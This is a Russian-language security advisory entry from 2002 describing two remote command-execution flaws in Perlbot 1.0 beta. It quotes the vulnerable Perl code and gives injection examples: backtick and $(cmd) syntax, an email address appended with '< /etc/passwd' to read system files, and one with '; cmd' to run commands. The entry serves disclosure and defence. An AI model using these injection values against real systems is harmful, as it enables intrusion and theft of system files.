Дата публикации: | 21.10.2002 |
Всего просмотров: | 1198 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | В программе Perlbot (www.perlbot.com) обнаружено 2 уязвимости: 1. Из-за недостаточной фильтрации ввода пользователя, Perlbot сценарий может использоваться для выполнения произвольных команд, с привилегиями Web сервера. Проблема находится в следующем коде: foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`) Команды могут задаваться следующим образом: `cmd`, $(cmd) или \xxx, где xxx – восьмеричное значение любого символа. 2. Из-за недостаточной фильтрации и неправильного вызова open(), когда сценарий пытается послать электронное сообщение, можно выполнить произвольные команды. Проблема находится в следующем коде: open (MAIL,"| $sendmail $recipient") || die $!; E-mail адрес, типа hacker@scan-associates.net < /etc/passwd позволяет читать произвольные файлы на системе пользователя. E-mail адрес, hacker@scan-associates.net ; cmd – позволяет выполнять произвольные команды. Уязвимость обнаружена в Perlbot 1.0 beta |
Ссылки: | SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution |